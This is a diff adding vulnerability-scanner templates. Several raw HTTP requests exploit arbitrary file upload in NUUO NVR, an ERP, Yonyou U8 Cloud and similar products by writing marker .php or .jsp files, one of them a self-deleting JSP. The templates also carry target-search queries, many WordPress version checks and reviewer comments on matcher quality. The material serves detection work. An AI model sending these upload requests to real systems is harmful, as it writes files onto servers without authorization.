+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-CN,zh;q=0.9
+ Cache-Control: max-age=0
+ Connection: close
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
+ Upgrade-Insecure-Requests: 1
+
+ ------WebKitFormBoundary1imovELzPsfzp5dN
+ Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
+ Content-Type: application/octet-stream
+
+ nyhelxrutzwhrsvsrafb
+ ------WebKitFormBoundary1imovELzPsfzp5dN
+ Content-Disposition: form-data; name="key"
+
+ null
+ ------WebKitFormBoundary1imovELzPsfzp5dN
+ Content-Disposition: form-data; name="form"
+
+ null
+ ------WebKitFormBoundary1imovELzPsfzp5dN
+ Content-Disposition: form-data; name="field"
+
+ null
+ ------WebKitFormBoundary1imovELzPsfzp5dN
+ Content-Disposition: form-data; name="filetitile"
+
+ null
+ ------WebKitFormBoundary1imovELzPsfzp5dN
+ Content-Disposition: form-data; name="filefolder"
+
+ null
+ ------WebKitFormBoundary1imovELzPsfzp5dN--
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
diff --git a/poc/upload/nuuo-upload-uploadfile.yaml b/poc/upload/nuuo-upload-uploadfile.yaml
new file mode 100644
index 0000000000..0d2a57cc7f
--- /dev/null
+++ b/poc/upload/nuuo-upload-uploadfile.yaml
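Review bot: The only matcher in meite-crm-upload-upload is `status: 200`, so any host that answers 200 to this POST, such as a catch-all page, a login form or a WAF notice, is reported as a critical arbitrary upload. The result needs a confirming step that reads the stored file back and checks for the body marker, with name and marker generated per run under `variables` instead of the fixed `kjldycpvjrm.jsp` and `nyhelxrutzwhrsvsrafb`. `description: description`, `reference: - https://` and `tags: tags` are unfilled placeholders and should be completed or removed, and the fixed `Content-Length: 708` should not be carried by hand.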
@@ -0,0 +1,36 @@
+id: nuuo-upload-uploadfile
+
+info:
+ name: nuuo-upload-uploadfile
+ author: PokerSEC
+ severity: critical
+ metadata:
+ fofasearch: title="Network Video Recorder Login"
+variables:
+ filename: "{{to_lower(rand_base(10))}}"
+ flag: "{{to_lower(rand_base(10))}}"
+requests:
+ - raw:
+ - |-
+ POST /upload.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=--------WebKitFormBoundaryJmuhnxJC760qNhIs
+ accept: */*
+ Content-Length: 152
+
+ ----------WebKitFormBoundaryJmuhnxJC760qNhIs
+ Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php"
+
+ {{flag}}
+ ----------WebKitFormBoundaryJmuhnxJC760qNhIs--
+
+ - |+
+ GET /{{filename}}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_1==200 && status_code_2==200 && contains_all(body_2,"{{flag}}")
diff --git a/poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml b/poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml
new file mode 100644
index 0000000000..204c4cf146
--- /dev/null
+++ b/poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml
@@ -0,0 +1,45 @@
+id: poguanjia-erp-uploadimgnocheck-fileupload
+
+info:
+ name: poguanjia-erp-uploadimgnocheck-fileupload
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="/Utility/JSHeadJump.js" || icon_hash="-1513302527"
+
+variables:
+ filename: "{{to_lower(rand_base(6))}}"
+ flag: "{{to_lower(rand_base(8))}}"
+ boundary: "{{to_lower(rand_base(20))}}"
+
+http:
+ - raw:
+ - |
+ POST /api/Upload/UploadImgNoCheck?m_server_name=ShopUserImg HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+ Content-Type: multipart/form-data; boundary=---------------------------{{boundary}}
+
+ -----------------------------{{boundary}}
+ Content-Disposition: form-data; name="image"; filename="{{filename}}.txt"
+ Content-Type: image/jpeg
+
+ GIF89a
+ {{flag}}
+ -----------------------------{{boundary}}--
+
+ - |
+ GET {{url}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && status_code_2==200 && contains_all(body,"{{flag}}")
+
+ extractors:
+ - type: json
+ internal: true
+ name: url
+ json:
+ - '.Data[]'
\ No newline at end of file
diff --git a/poc/upload/yongyou-u8c-esnserver-fileupload.yaml b/poc/upload/yongyou-u8c-esnserver-fileupload.yaml
new file mode 100644
index 0000000000..3fc3313fef
--- /dev/null
+++ b/poc/upload/yongyou-u8c-esnserver-fileupload.yaml
@@ -0,0 +1,35 @@
+id: yongyou-u8c-esnserver-fileupload
+
+info:
+ name: yongyou-u8c-esnserver-fileupload
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="用友-U8-Cloud"
+
+
+variables:
+ filename: "{{to_lower(rand_base(10))}}"
+
+
+http:
+ - raw:
+ - |
+ POST /service/esnserver HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+ Token: 469ce01522f64366750d1995ca119841
+ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+
+ {"invocationInfo":{"ucode":"123","dataSource":"U8cloud","lang":"en"},"method":"uploadFile","className":"nc.itf.hr.tools.IFileTrans","param":{"p1":"UEsDBBQAAAAAAPR5NFm2C9sJVgAAAFYAAAAKAAAAY29tcHJlc3NlZDwlbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPjEyMzEyUEsBAhQAFAAAAAAA9Hk0WbYL2wlWAAAAVgAAAAoAAAAAAAAAAAAAALaBAAAAAGNvbXByZXNzZWRQSwUGAAAAAAEAAQA4AAAAfgAAAAAA","p2":"webapps/u8c_web/{{filename}}.jsp"},"paramType":["p1:[B","p2:java.lang.String"]}
+
+ - |
+ GET /{{filename}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body_2,"12312")
\ No newline at end of file
diff --git a/poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml b/poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml
new file mode 100644
index 0000000000..9864b40bf6
--- /dev/null
+++ b/poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml
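Review bot: The marker checked by `contains_all(body_2,"12312")` in yongyou-u8c-esnserver-fileupload is five digits and identical on every run, short enough to occur by chance in a catch-all 200 page (ids, timestamps, asset hashes), so a critical finding can rest on a coincidence. Since the content is a fixed encoded blob, the marker cannot be randomised without regenerating it, but the matcher should at least name the response it means, `status_code_2==200 && contains_all(body_2,"12312")`, and ideally use a longer marker. The hard-coded `Token:` header has no explanation; a YAML comment saying where the value comes from, plus `description` and `tags` in `info`, would let a reviewer judge the template.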
@@ -0,0 +1,27 @@ +id: yonyou-U8clouderp-upload-uploadfile + +info: + name: yonyou-U8clouderp-upload-uploadfile + author: PokerSec + severity: critical + metadata: + fofasearch: app="用友-U8-Cloud" +variables: + file_name: "{{to_lower(rand_text_alpha(8))}}" + file_content: "{{to_lower(rand_text_alpha(8))}}" +requests: + - raw: + - | + POST /linux/pages/upload.jsp HTTP/1.1 + Host: {{Hostname}} + filename:{{file_name}}.jsp + + {{file_content}} + - | + GET /linux/{{file_name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body_2,"{{file_content}}") diff --git a/poc/web/lanling-oa-hrstaffwebservice-fileread.yaml b/poc/web/lanling-oa-hrstaffwebservice-fileread.yaml new file mode 100644 index 0000000000..67934230a9 --- /dev/null +++ b/poc/web/lanling-oa-hrstaffwebservice-fileread.yaml @@ -0,0 +1,42 @@ +id: lanling-oa-hrstaffwebservice-fileread + +info: + name: lanling-oa-hrstaffwebservice-fileread + author: PokerSec + severity: high + metadata: + fofasearch: body="Com_Parameter" + +variables: + boundary: "{{to_lower(rand_base(20))}}" + +http: + - raw: + - | + POST /sys/webservice/hrStaffWebService HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/related; boundary=----{{boundary}} + SOAPAction: "" + + ------{{boundary}} + Content-Disposition: form-data; name="a" + + + + + + + a + + + + + + ------{{boundary}}-- + + matchers: + - type: dsl + dsl: + - status_code==500 && contains_all(body,"") && contains_all(body,"Unmarshalling Error") \ No newline at end of file diff --git a/poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml b/poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml new file mode 100644 index 0000000000..60a2a811ad --- /dev/null +++ b/poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml 
@@ -0,0 +1,59 @@ +id: webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + google-query: inurl:"/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,webd-woocommerce-product-excel-importer-bulk-edit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/webd-woocommerce-product-excel-importer-bulk-edit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "webd-woocommerce-product-excel-importer-bulk-edit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.6') \ No newline at end of file diff --git a/poc/wordpress/indeed-wp-superbackup.yaml b/poc/wordpress/indeed-wp-superbackup.yaml new file mode 100644 index 0000000000..56b18b8b9e --- /dev/null +++ b/poc/wordpress/indeed-wp-superbackup.yaml 
@@ -0,0 +1,59 @@ +id: indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1 + +info: + name: > + Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/indeed-wp-superbackup/" + google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-wp-superbackup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/wordpress/jlayer-parallax-slider-wp.yaml b/poc/wordpress/jlayer-parallax-slider-wp.yaml new file mode 100644 index 0000000000..54f299499e --- /dev/null +++ b/poc/wordpress/jlayer-parallax-slider-wp.yaml 
@@ -0,0 +1,59 @@ +id: jlayer-parallax-slider-wp-8ff10f61dea7350124b039f1e92690b4 + +info: + name: > + jLayer Parallax Slider <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/33e5ca87-2e45-4b85-818e-02093bbf66ee?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jlayer-parallax-slider-wp/" + google-query: inurl:"/wp-content/plugins/jlayer-parallax-slider-wp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jlayer-parallax-slider-wp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jlayer-parallax-slider-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jlayer-parallax-slider-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/wordpress/jwp-a11y.yaml b/poc/wordpress/jwp-a11y.yaml new file mode 100644 index 0000000000..cb3ec3c829 --- /dev/null +++ b/poc/wordpress/jwp-a11y.yaml 
@@ -0,0 +1,59 @@
+id: jwp-a11y-83352b6551092dd47080d7d2a29a35ff
+
+info:
+ name: >
+ jwp-a11y <= 4.1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d0da23a-12e6-4e57-8413-dc86a62b1800?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/jwp-a11y/"
+ google-query: inurl:"/wp-content/plugins/jwp-a11y/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,jwp-a11y,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/jwp-a11y/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "jwp-a11y"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.1.7')
\ No newline at end of file
diff --git a/poc/wordpress/real-wp-shop-lite.yaml b/poc/wordpress/real-wp-shop-lite.yaml
new file mode 100644
index 0000000000..452f74fed4
--- /dev/null
+++ b/poc/wordpress/real-wp-shop-lite.yaml
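Review bot: Both extractors in the jwp-a11y template are named `version` and use the same regex, differing only in `internal: true`, which reads as an accidental duplicate. A one-line comment above them would make the intent explicit, e.g. `# internal copy feeds compare_versions; the second copy prints the version in results`. The regex is also unanchored, so `Stable tag:` text anywhere in the readme body can supply the compared value. Assuming the header starts its line, `"(?mi)^Stable tag: ([0-9.]+)"` keeps the match to the header. The same extractor pair appears in the other templates in this part of the patch.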
@@ -0,0 +1,59 @@
+id: real-wp-shop-lite-91a45dec7983fa3e47682bea55d7171d
+
+info:
+ name: >
+ Real WP Shop Lite Ajax eCommerce Shopping Cart <= 2.0.8 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd75955-3c9e-4cac-b952-f705a2129707?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/real-wp-shop-lite/"
+ google-query: inurl:"/wp-content/plugins/real-wp-shop-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,real-wp-shop-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/real-wp-shop-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "real-wp-shop-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.8')
\ No newline at end of file
diff --git a/poc/wordpress/users-import-export-with-excel-for-wp.yaml b/poc/wordpress/users-import-export-with-excel-for-wp.yaml
new file mode 100644
index 0000000000..ce5f21377c
--- /dev/null
+++ b/poc/wordpress/users-import-export-with-excel-for-wp.yaml
@@ -0,0 +1,59 @@
+id: users-import-export-with-excel-for-wp-ca4c619b208bcba2a3262a03cfacdba5
+
+info:
+ name: >
+ PHPSpreadsheet Library < 2.3.0 - XXE Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/users-import-export-with-excel-for-wp/"
+ google-query: inurl:"/wp-content/plugins/users-import-export-with-excel-for-wp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,users-import-export-with-excel-for-wp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/users-import-export-with-excel-for-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "users-import-export-with-excel-for-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml b/poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml
new file mode 100644
index 0000000000..5e9793a957
--- /dev/null
+++ b/poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml
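Review bot: The `name` in the users-import-export-with-excel-for-wp template describes `PHPSpreadsheet Library < 2.3.0`, but the `dsl` matcher compares the plugin's own readme `Stable tag` with `<= 1.5`, so the title and the check refer to two different version lines. Presumably plugin releases up to 1.5 bundle the affected library, but nothing in the template says so, and a reader of the finding cannot tell which component to upgrade. I would state the mapping in the empty `description: >`, for example `Plugin versions <= 1.5 bundle PHPSpreadsheet < 2.3.0 (XXE); detection is by plugin version only.`, after confirming it against the referenced Wordfence entry.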
@@ -0,0 +1,59 @@
+id: wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5
+
+info:
+ name: >
+ WP Ad Guru – Banner ad, Responsive popup, Popup maker, Ad rotator & More <= 2.5.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa9edf84-7ba0-488c-93ca-ed0b2ee435d5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-ad-guru/"
+ google-query: inurl:"/wp-content/plugins/wp-ad-guru/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-ad-guru,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-ad-guru/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-ad-guru"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.4')
\ No newline at end of file
diff --git a/poc/wordpress/wp-auctions.yaml b/poc/wordpress/wp-auctions.yaml
new file mode 100644
index 0000000000..5bfeb3fd4e
--- /dev/null
+++ b/poc/wordpress/wp-auctions.yaml
@@ -0,0 +1,59 @@
+id: wp-auctions-89ead7db0eb36d917e5bca365b6051f0
+
+info:
+ name: >
+ WordPress Auction Plugin <= 3.7 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c240829-0672-4ac2-b49a-2068a0a549f1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-auctions/"
+ google-query: inurl:"/wp-content/plugins/wp-auctions/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-auctions,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-auctions/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-auctions"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7')
\ No newline at end of file
diff --git a/poc/wordpress/wp-donimedia-carousel.yaml b/poc/wordpress/wp-donimedia-carousel.yaml
new file mode 100644
index 0000000000..06f21ffec5
--- /dev/null
+++ b/poc/wordpress/wp-donimedia-carousel.yaml
@@ -0,0 +1,59 @@
+id: wp-donimedia-carousel-3ee6db1ee25b24e0072c18227982adb0
+
+info:
+ name: >
+ WP donimedia carousel <= 1.0.1 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff09292b-c8a6-4cd8-a8dd-d79b4c713d6f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-donimedia-carousel/"
+ google-query: inurl:"/wp-content/plugins/wp-donimedia-carousel/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-donimedia-carousel,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-donimedia-carousel/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-donimedia-carousel"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml b/poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml
new file mode 100644
index 0000000000..866fe15a03
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml
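Review bot: `severity: low` and the trailing `low` tag in the wp-donimedia-carousel template look inconsistent with its title, which describes arbitrary file upload reachable from a Subscriber account; the unauthenticated file-upload template for indeed-wp-superbackup in this same patch is rated `critical`. With `cvss-score:` empty there is nothing on the page to justify the rating, so it may be a generator default. Please confirm the score in the referenced Wordfence entry and set `severity` and the tag to match, so that this finding is not filtered out of triage.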
@@ -0,0 +1,59 @@
+id: wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360
+
+info:
+ name: >
+ WP Job Portal <= 2.2.2 - Missing Authorization to Unauthenticated Arbitrary Resume Download
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc87d5f-dba4-40f8-946f-f2634614b579?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml b/poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml
new file mode 100644
index 0000000000..652a16d255
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml
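Review bot: This template and the five wp-job-portal templates that follow it send the identical readme.txt request, and five of the six use the identical `compare_versions(version, '<= 2.2.2')` matcher (the unauthenticated SQL injection one uses `<= 2.2.1`). A single install at or below those versions therefore yields five or six findings from the same evidence, with severities ranging from `low` to `critical`. None of the templates can tell the issues apart on the target, and the empty `description: >` leaves only the title to distinguish them. I would fill each `description` with the affected function or endpoint from its Wordfence entry and note that all six rest on one version check.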
@@ -0,0 +1,59 @@
+id: wp-job-portal-44ca926d802c7e810b6f185672896cf3
+
+info:
+ name: >
+ WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml b/poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml
new file mode 100644
index 0000000000..60fb2ce84d
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml
@@ -0,0 +1,59 @@
+id: wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52
+
+info:
+ name: >
+ WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via wpjobportal_deactivate()
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4d67675a-b77b-41c6-a94f-d9385e609b37?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
